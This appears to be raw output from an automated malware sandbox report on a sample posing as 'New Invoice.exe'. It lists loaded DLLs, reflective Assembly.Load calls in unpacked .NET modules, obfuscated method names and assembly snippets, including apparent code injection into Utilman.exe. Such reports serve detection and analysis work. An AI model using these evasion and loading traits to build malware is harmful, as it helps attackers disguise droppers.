Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, bBN5f1W5eu358I6eM1.cs	.Net Code: lpOC9jtlCC System.Reflection.Assembly.Load(byte[])
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, bBN5f1W5eu358I6eM1.cs	.Net Code: lpOC9jtlCC System.Reflection.Assembly.Load(byte[])
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, bBN5f1W5eu358I6eM1.cs	.Net Code: lpOC9jtlCC System.Reflection.Assembly.Load(byte[])
Source: 0.2.New Invoice.exe.3cc4128.3.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.New Invoice.exe.3ca4108.2.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.New Invoice.exe.6de0000.4.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00418071 push eax; retf	4_2_00418084
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0041801E push eax; retf	4_2_00418084
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_004033F0 push eax; ret	4_2_004033F2
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00414586 push ecx; iretd	4_2_00414587
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_004015A7 push edx; retf	4_2_004015DD
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00401664 push edx; retf	4_2_00401671
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0040170A push edx; retf	4_2_004017A0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00417FCE push eax; retf	4_2_00418084
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00401792 push edx; retf	4_2_004017A0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_004017B5 push edx; retf	4_2_004017C5
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0137225F pushad ; ret	4_2_013727F9
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013727FA pushad ; ret	4_2_013727F9
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013A09AD push ecx; mov dword ptr [esp], ecx	4_2_013A09B6
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0137283D push eax; iretd	4_2_01372858
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01371344 push eax; iretd	4_2_01371369
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F37CEE push ecx; iretd	5_2_04F37CEF
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F3953D push esp; iretd	5_2_04F39540
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F3B7D9 push eax; retf	5_2_04F3B7EC
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F3B786 push eax; retf	5_2_04F3B7EC
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F3B736 push eax; retf	5_2_04F3B7EC
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F39167 push ecx; ret	5_2_04F39168
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F39103 push edx; ret	5_2_04F39104
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F39AD4 push cs; ret	5_2_04F39AD5
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050A27FA pushad ; ret	6_2_050A27F9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050A225F pushad ; ret	6_2_050A27F9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050D09AD push ecx; mov dword ptr [esp], ecx	6_2_050D09B6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050A283D push eax; iretd	6_2_050A2858
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050A1368 push eax; iretd	6_2_050A1369
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FCC299 push eax; retf	6_2_02FCC2CE
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FCC141 pushad ; retf	6_2_02FCC142
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FC260C push ecx; ret	6_2_02FC260D

Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, I0vrvhsWlP7eZDPrko.cs	High entropy of concatenated method names: 'MVHSoBaCOa', 'nOFStxl81T', 'ftISYJeNm7', 'd5CSP1TGhk', 'E3uS5WKqdj', 'zxtS0nR3Hk', 'P0tSwAk62r', 'VIHSTEWV5Z', 'gLiSIOHPom', 'GpeSiXLjD1'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, a76xWxtDOS5oQVRxfe.cs	High entropy of concatenated method names: 'AckVB91Gpx', 'jlJV4Np7lE', 'llPVo5lZ4X', 'rgPVtNEbnE', 'uvpVkMU3Sy', 'flJVZWJPmY', 'AvsVjtd6KU', 'pVFV3iVYE7', 'sPMVpQDLl9', 'tQkVyURVYs'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, zQL0JcMcvS0lIVZR1O.cs	High entropy of concatenated method names: 'jiskIVwdRq', 'km4kunS7mD', 'hYakMfXiag', 'zCxkhwwgEs', 'LOfkPGNTTZ', 'Ksak1OZrHq', 'iEek5WxPLU', 'nXAk0OscVp', 'KTDkEcSXX0', 'KfmkwOQ1k4'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, NaaDd3LSe6RsZ3CBkK.cs	High entropy of concatenated method names: 'ToString', 'lHCZirrW16', 'WUYZPtm1Cq', 'xmyZ1PC9Vq', 'L5wZ5DMB7B', 'qqtZ0w6BgG', 'DDUZEIm0q6', 'jxuZwHo6OJ', 'D2aZTr8KQK', 'JeaZvmbECw'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, wBxcsbfe7lu0E3pSYJ.cs	High entropy of concatenated method names: 'tiFQauwMPY', 'APmQDSUZ40', 'chKV1H9JJr', 'B73V54tlE2', 'GFMV0sGu54', 'DdeVEEUCMK', 'nDWVwe1Vda', 'moaVT9wB9u', 'rs2Vvj0OnO', 'U4bVItQxHD'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, m337WZRxYhGITjqex7.cs	High entropy of concatenated method names: 'uHYyVPgg26', 'i2gyQQHamb', 'R05yc6LaPu', 'B0EyncbuI6', 'GyCypn3Hv5', 'Xc7yWS0wxr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, o9ErG5YH9B6Se5kMQm.cs	High entropy of concatenated method names: 'T2ycbLELNJ', 'FhycNdSbWT', 'tXecQXoIIE', 'Ub3cnlrYdb', 'I8bcW4JDWp', 'okaQURHSjM', 'x2ZQKFRaAs', 'z4RQ7cmOQG', 'FXAQrZlOOl', 't4IQgem1VD'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, CtwwZOvw1PE5nvTpFn.cs	High entropy of concatenated method names: 'aeInlPFO5N', 'VoknJ5W0Ml', 'BlDn9g89JL', 'yWBnBZM6YY', 'Kdmnakn1R5', 'pMvn41RvD6', 'vS4nDgjiLg', 'IodnoZ0tqx', 'LTInt55p3P', 'vxinflq2Nq'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, kTakehKdqvpG0HLdWU.cs	High entropy of concatenated method names: 'bbTjrfOt7b', 'JCkjRiUEKG', 'iPs3O9OYge', 'WWA3Hd6oXN', 'LBfjiuJvQu', 'kjOjue09uT', 'rwDjstRfh0', 'g3YjMc7jI4', 'L1Ojhsjrlt', 'FAojLyaBeh'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, JkSZ7RHHFFckmtaWNaW.cs	High entropy of concatenated method names: 'WZiyRLrYHP', 'EwJyzWHAB2', 'i2FdOc7qKs', 'jypdHWMqld', 'ynpd2AfpNN', 'vFqdxIBwHr', 'le1dCPStGo', 'O47dbmQQOO', 'V0Fd6FQBaN', 'r6qdNHCw6y'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, Or5NKaw6U8vRo4MLXO.cs	High entropy of concatenated method names: 'z7nn63h3lR', 'tMUnVfXYd8', 'Jpwnc2BIlX', 'Jw5cRHZyGJ', 'xhsczFjXMD', 'aOvnOCSeCi', 'MhdnHMKHBw', 'LuYn291orV', 'U47nxXEaV6', 'Dp5nCUhDp8'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, f3A8pBHOEg1vBjBXysp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'j4GyivFluh', 'CtLyuZXOWo', 'SyRysvfQ6f', 'kNXyMvfIAj', 'EgHyhlW560', 'Xq0yLM45FS', 'lEhyefvGFM'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, rWnNs0efUX00IrjHdD.cs	High entropy of concatenated method names: 's59jmlV4xO', 'ykZj8GGQIp', 'ToString', 'PFUj6r9uCG', 'umPjNTO3PX', 'AHojVLdvx6', 'QGEjQBMiTo', 'EfYjcDrAsR', 'YZQjnPt3NZ', 'UhVjWUHh1d'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, yEJxLgzbwuuSjRJ3jQ.cs	High entropy of concatenated method names: 'Xl4y45tFGO', 'LmQyospYD2', 'Ja0ytqGrM8', 'UVCyYvIQQl', 'Fs7yPft459', 'uvpy5l7PkM', 'paZy0l31FN', 'rnwyGqT3J1', 'qW9ylpw6en', 'QUVyJtlV52'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, VhLFfGUCVi57MpmsK8.cs	High entropy of concatenated method names: 'BPgjpLcCgr', 'QVmjyVnw1D', 'Gb3jdmLuEZ', 'Y4epS5tixKg2yTWiFqa', 'IV0pfEt6RMBuEIXD1Aa', 'M9QPUOtYDw3y8KJBC71'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, NJUhNmPh8N7bPAEZQT.cs	High entropy of concatenated method names: 'ziqKSGCy5j2TDuPmQR6', 'smUq2sCdGLagjQQ6rOX', 'zc0c368rgk', 'l7IcpVpFvm', 'iqAcyqRpx1', 'xIIZewCn8yHiBas6uY7', 'AR5leGCo1tKMOqOgjRX'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, bBN5f1W5eu358I6eM1.cs	High entropy of concatenated method names: 'FBmxbjLd8j', 'd61x6bkEv3', 'R3sxNRW4bj', 'gJ7xV4wGqH', 'UdbxQYaUJu', 'XYnxcid2s9', 'IknxnThbGW', 'vXYxWcP9C0', 'EuZxqoCftV', 'MdRxm9lMhi'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, WcdB53H2wet4GmbZWu8.cs	High entropy of concatenated method names: 'ToString', 'xT4doVo51M', 'XvxdtKPuII', 'NCAdfaV9nY', 'CBadYhDXmp', 'mLadPSUGWY', 'yVrd1JfLip', 'nsPd5TsQVT', 'xJ2QustvOq4yowJU3BF', 'wvZrEGt92opSXEWb1LG'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, JVrnAsHCwZCEwge8IN7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tvKApFrkHQ', 'gjWAyrdYdL', 'Y2BAdb388D', 'AWfAAfkqpe', 'l7vAFWCsIu', 'QfOAX60P7j', 'CPtAGv9GB3'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, bsDGY8VgSO9BxSurjD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'iYD2gONGXc', 'A3D2R6ys7M', 'KPG2zN1ECZ', 'LiExOF4MLh', 'wjnxHbQrTc', 'NCVx23sUMt', 'RHYxxoYAIb', 'mA8VXWXs3XcIwFLjYEC'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, AdOvZT7ABI4oWsrAZs.cs	High entropy of concatenated method names: 'am4pkdZb2a', 'Ua3pjRaehI', 'I1IppZghQZ', 'rVZpdwW0au', 'OjQpFJKmp6', 'iKwpGOZBuJ', 'Dispose', 'hvJ36yAayk', 'm4C3NwLKIZ', 'o3m3VUIc2Q'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, EK5hK9oCWabKYcxdoC.cs	High entropy of concatenated method names: 'M69NM2DR2w', 'lbQNh5a2LN', 'ojCNLEvVyG', 'cmeNecPwqs', 'RJKNUMI51p', 'S4sNK2AJsR', 'pDbN7eJP0H', 'jnqNrKhJaM', 'ArMNgCYwZi', 'eAUNRPH6vk'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, v26PybNMMKU7Gk7Kf7.cs	High entropy of concatenated method names: 'Dispose', 'N4oHgWsrAZ', 'wIu2PcHYvd', 'h5xlR460ox', 'QDhHRroMBb', 'JjNHzOaQ0P', 'ProcessDialogKey', 'J5L2OaxWdS', 'In32HcMRHa', 'Mbb228337W'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, ewOveD25mXsdtDIXU5.cs	High entropy of concatenated method names: 'msn97di1Q', 'uGLBaM5Vm', 'XS24XJHRP', 'F3vDP4XHy', 'waDtMnygt', 'QdNfk9alw', 'yU1nsuHPPkuSl6fUOF', 'PfvRfeTgSoGou9wNo8', 'miH3WxVU5', 'cCJyH1NTw'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, S7ZkwtC9w9UtY8fsDC.cs	High entropy of concatenated method names: 'jhtHnK5hK9', 'dWaHWbKYcx', 'dDOHmS5oQV', 'YxfH8eXBxc', 'rpSHkYJk9E', 'WG5HZH9B6S', 'iHSolEbr3Kw0myTD8M', 'b3JSLMcLaCoGQ2FqQt', 'ngCHHrEjSQ', 'LJgHxgjHUS'
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, SaxWdSg5n3cMRHavbb.cs	High entropy of concatenated method names: 'nt2pY9MM7U', 'KQspP6gWpu', 'GjGp1VPrBF', 'Y1mp5Wlxim', 'Nrmp0AVJb3', 'fdhpESoUZR', 'IOZpwCZO9r', 'HWlpTYoUS5', 'q4CpvtKU84', 'M81pIBHKBZ'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, I0vrvhsWlP7eZDPrko.cs	High entropy of concatenated method names: 'MVHSoBaCOa', 'nOFStxl81T', 'ftISYJeNm7', 'd5CSP1TGhk', 'E3uS5WKqdj', 'zxtS0nR3Hk', 'P0tSwAk62r', 'VIHSTEWV5Z', 'gLiSIOHPom', 'GpeSiXLjD1'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, a76xWxtDOS5oQVRxfe.cs	High entropy of concatenated method names: 'AckVB91Gpx', 'jlJV4Np7lE', 'llPVo5lZ4X', 'rgPVtNEbnE', 'uvpVkMU3Sy', 'flJVZWJPmY', 'AvsVjtd6KU', 'pVFV3iVYE7', 'sPMVpQDLl9', 'tQkVyURVYs'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, zQL0JcMcvS0lIVZR1O.cs	High entropy of concatenated method names: 'jiskIVwdRq', 'km4kunS7mD', 'hYakMfXiag', 'zCxkhwwgEs', 'LOfkPGNTTZ', 'Ksak1OZrHq', 'iEek5WxPLU', 'nXAk0OscVp', 'KTDkEcSXX0', 'KfmkwOQ1k4'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, NaaDd3LSe6RsZ3CBkK.cs	High entropy of concatenated method names: 'ToString', 'lHCZirrW16', 'WUYZPtm1Cq', 'xmyZ1PC9Vq', 'L5wZ5DMB7B', 'qqtZ0w6BgG', 'DDUZEIm0q6', 'jxuZwHo6OJ', 'D2aZTr8KQK', 'JeaZvmbECw'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, wBxcsbfe7lu0E3pSYJ.cs	High entropy of concatenated method names: 'tiFQauwMPY', 'APmQDSUZ40', 'chKV1H9JJr', 'B73V54tlE2', 'GFMV0sGu54', 'DdeVEEUCMK', 'nDWVwe1Vda', 'moaVT9wB9u', 'rs2Vvj0OnO', 'U4bVItQxHD'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, m337WZRxYhGITjqex7.cs	High entropy of concatenated method names: 'uHYyVPgg26', 'i2gyQQHamb', 'R05yc6LaPu', 'B0EyncbuI6', 'GyCypn3Hv5', 'Xc7yWS0wxr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, o9ErG5YH9B6Se5kMQm.cs	High entropy of concatenated method names: 'T2ycbLELNJ', 'FhycNdSbWT', 'tXecQXoIIE', 'Ub3cnlrYdb', 'I8bcW4JDWp', 'okaQURHSjM', 'x2ZQKFRaAs', 'z4RQ7cmOQG', 'FXAQrZlOOl', 't4IQgem1VD'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, CtwwZOvw1PE5nvTpFn.cs	High entropy of concatenated method names: 'aeInlPFO5N', 'VoknJ5W0Ml', 'BlDn9g89JL', 'yWBnBZM6YY', 'Kdmnakn1R5', 'pMvn41RvD6', 'vS4nDgjiLg', 'IodnoZ0tqx', 'LTInt55p3P', 'vxinflq2Nq'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, kTakehKdqvpG0HLdWU.cs	High entropy of concatenated method names: 'bbTjrfOt7b', 'JCkjRiUEKG', 'iPs3O9OYge', 'WWA3Hd6oXN', 'LBfjiuJvQu', 'kjOjue09uT', 'rwDjstRfh0', 'g3YjMc7jI4', 'L1Ojhsjrlt', 'FAojLyaBeh'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, JkSZ7RHHFFckmtaWNaW.cs	High entropy of concatenated method names: 'WZiyRLrYHP', 'EwJyzWHAB2', 'i2FdOc7qKs', 'jypdHWMqld', 'ynpd2AfpNN', 'vFqdxIBwHr', 'le1dCPStGo', 'O47dbmQQOO', 'V0Fd6FQBaN', 'r6qdNHCw6y'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, Or5NKaw6U8vRo4MLXO.cs	High entropy of concatenated method names: 'z7nn63h3lR', 'tMUnVfXYd8', 'Jpwnc2BIlX', 'Jw5cRHZyGJ', 'xhsczFjXMD', 'aOvnOCSeCi', 'MhdnHMKHBw', 'LuYn291orV', 'U47nxXEaV6', 'Dp5nCUhDp8'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, f3A8pBHOEg1vBjBXysp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'j4GyivFluh', 'CtLyuZXOWo', 'SyRysvfQ6f', 'kNXyMvfIAj', 'EgHyhlW560', 'Xq0yLM45FS', 'lEhyefvGFM'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, rWnNs0efUX00IrjHdD.cs	High entropy of concatenated method names: 's59jmlV4xO', 'ykZj8GGQIp', 'ToString', 'PFUj6r9uCG', 'umPjNTO3PX', 'AHojVLdvx6', 'QGEjQBMiTo', 'EfYjcDrAsR', 'YZQjnPt3NZ', 'UhVjWUHh1d'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, yEJxLgzbwuuSjRJ3jQ.cs	High entropy of concatenated method names: 'Xl4y45tFGO', 'LmQyospYD2', 'Ja0ytqGrM8', 'UVCyYvIQQl', 'Fs7yPft459', 'uvpy5l7PkM', 'paZy0l31FN', 'rnwyGqT3J1', 'qW9ylpw6en', 'QUVyJtlV52'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, VhLFfGUCVi57MpmsK8.cs	High entropy of concatenated method names: 'BPgjpLcCgr', 'QVmjyVnw1D', 'Gb3jdmLuEZ', 'Y4epS5tixKg2yTWiFqa', 'IV0pfEt6RMBuEIXD1Aa', 'M9QPUOtYDw3y8KJBC71'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, NJUhNmPh8N7bPAEZQT.cs	High entropy of concatenated method names: 'ziqKSGCy5j2TDuPmQR6', 'smUq2sCdGLagjQQ6rOX', 'zc0c368rgk', 'l7IcpVpFvm', 'iqAcyqRpx1', 'xIIZewCn8yHiBas6uY7', 'AR5leGCo1tKMOqOgjRX'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, bBN5f1W5eu358I6eM1.cs	High entropy of concatenated method names: 'FBmxbjLd8j', 'd61x6bkEv3', 'R3sxNRW4bj', 'gJ7xV4wGqH', 'UdbxQYaUJu', 'XYnxcid2s9', 'IknxnThbGW', 'vXYxWcP9C0', 'EuZxqoCftV', 'MdRxm9lMhi'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, WcdB53H2wet4GmbZWu8.cs	High entropy of concatenated method names: 'ToString', 'xT4doVo51M', 'XvxdtKPuII', 'NCAdfaV9nY', 'CBadYhDXmp', 'mLadPSUGWY', 'yVrd1JfLip', 'nsPd5TsQVT', 'xJ2QustvOq4yowJU3BF', 'wvZrEGt92opSXEWb1LG'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, JVrnAsHCwZCEwge8IN7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tvKApFrkHQ', 'gjWAyrdYdL', 'Y2BAdb388D', 'AWfAAfkqpe', 'l7vAFWCsIu', 'QfOAX60P7j', 'CPtAGv9GB3'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, bsDGY8VgSO9BxSurjD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'iYD2gONGXc', 'A3D2R6ys7M', 'KPG2zN1ECZ', 'LiExOF4MLh', 'wjnxHbQrTc', 'NCVx23sUMt', 'RHYxxoYAIb', 'mA8VXWXs3XcIwFLjYEC'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, AdOvZT7ABI4oWsrAZs.cs	High entropy of concatenated method names: 'am4pkdZb2a', 'Ua3pjRaehI', 'I1IppZghQZ', 'rVZpdwW0au', 'OjQpFJKmp6', 'iKwpGOZBuJ', 'Dispose', 'hvJ36yAayk', 'm4C3NwLKIZ', 'o3m3VUIc2Q'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, EK5hK9oCWabKYcxdoC.cs	High entropy of concatenated method names: 'M69NM2DR2w', 'lbQNh5a2LN', 'ojCNLEvVyG', 'cmeNecPwqs', 'RJKNUMI51p', 'S4sNK2AJsR', 'pDbN7eJP0H', 'jnqNrKhJaM', 'ArMNgCYwZi', 'eAUNRPH6vk'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, v26PybNMMKU7Gk7Kf7.cs	High entropy of concatenated method names: 'Dispose', 'N4oHgWsrAZ', 'wIu2PcHYvd', 'h5xlR460ox', 'QDhHRroMBb', 'JjNHzOaQ0P', 'ProcessDialogKey', 'J5L2OaxWdS', 'In32HcMRHa', 'Mbb228337W'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, ewOveD25mXsdtDIXU5.cs	High entropy of concatenated method names: 'msn97di1Q', 'uGLBaM5Vm', 'XS24XJHRP', 'F3vDP4XHy', 'waDtMnygt', 'QdNfk9alw', 'yU1nsuHPPkuSl6fUOF', 'PfvRfeTgSoGou9wNo8', 'miH3WxVU5', 'cCJyH1NTw'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, S7ZkwtC9w9UtY8fsDC.cs	High entropy of concatenated method names: 'jhtHnK5hK9', 'dWaHWbKYcx', 'dDOHmS5oQV', 'YxfH8eXBxc', 'rpSHkYJk9E', 'WG5HZH9B6S', 'iHSolEbr3Kw0myTD8M', 'b3JSLMcLaCoGQ2FqQt', 'ngCHHrEjSQ', 'LJgHxgjHUS'
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, SaxWdSg5n3cMRHavbb.cs	High entropy of concatenated method names: 'nt2pY9MM7U', 'KQspP6gWpu', 'GjGp1VPrBF', 'Y1mp5Wlxim', 'Nrmp0AVJb3', 'fdhpESoUZR', 'IOZpwCZO9r', 'HWlpTYoUS5', 'q4CpvtKU84', 'M81pIBHKBZ'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, I0vrvhsWlP7eZDPrko.cs	High entropy of concatenated method names: 'MVHSoBaCOa', 'nOFStxl81T', 'ftISYJeNm7', 'd5CSP1TGhk', 'E3uS5WKqdj', 'zxtS0nR3Hk', 'P0tSwAk62r', 'VIHSTEWV5Z', 'gLiSIOHPom', 'GpeSiXLjD1'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, a76xWxtDOS5oQVRxfe.cs	High entropy of concatenated method names: 'AckVB91Gpx', 'jlJV4Np7lE', 'llPVo5lZ4X', 'rgPVtNEbnE', 'uvpVkMU3Sy', 'flJVZWJPmY', 'AvsVjtd6KU', 'pVFV3iVYE7', 'sPMVpQDLl9', 'tQkVyURVYs'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, zQL0JcMcvS0lIVZR1O.cs	High entropy of concatenated method names: 'jiskIVwdRq', 'km4kunS7mD', 'hYakMfXiag', 'zCxkhwwgEs', 'LOfkPGNTTZ', 'Ksak1OZrHq', 'iEek5WxPLU', 'nXAk0OscVp', 'KTDkEcSXX0', 'KfmkwOQ1k4'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, NaaDd3LSe6RsZ3CBkK.cs	High entropy of concatenated method names: 'ToString', 'lHCZirrW16', 'WUYZPtm1Cq', 'xmyZ1PC9Vq', 'L5wZ5DMB7B', 'qqtZ0w6BgG', 'DDUZEIm0q6', 'jxuZwHo6OJ', 'D2aZTr8KQK', 'JeaZvmbECw'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, wBxcsbfe7lu0E3pSYJ.cs	High entropy of concatenated method names: 'tiFQauwMPY', 'APmQDSUZ40', 'chKV1H9JJr', 'B73V54tlE2', 'GFMV0sGu54', 'DdeVEEUCMK', 'nDWVwe1Vda', 'moaVT9wB9u', 'rs2Vvj0OnO', 'U4bVItQxHD'
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, m337WZRxYhGITjqex7.cs	High entropy of concatenated method names: 'uHYyVPgg26', 'i2gyQQHamb', 'R05yc6LaPu', 'B0EyncbuI6', 'GyCypn3Hv5', 'Xc7yWS0wxr', 'Next', 'Next', 'Next', 'NextBytes'
